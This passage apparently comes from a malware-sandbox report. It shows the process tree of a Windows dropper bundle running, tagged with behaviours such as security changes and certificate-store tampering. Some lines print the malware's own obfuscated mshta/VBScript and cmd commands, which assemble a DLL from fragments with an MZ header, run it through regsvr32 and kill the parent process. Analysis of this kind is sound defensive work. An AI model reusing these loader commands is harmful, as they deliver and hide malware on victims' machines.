                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:892
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7288
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7604
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Windows security modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7072
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5400
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7604
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7208
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8396
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\bwgirdw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Windows security modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe" -u
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp" /SL5="$C003A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 7FA35D192230D29377C29CDBACC7765C C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding AAEACF3D768C17F520F52CCF62B7C6F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding D76F3200D734577D59F6D8DE32425393 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6368
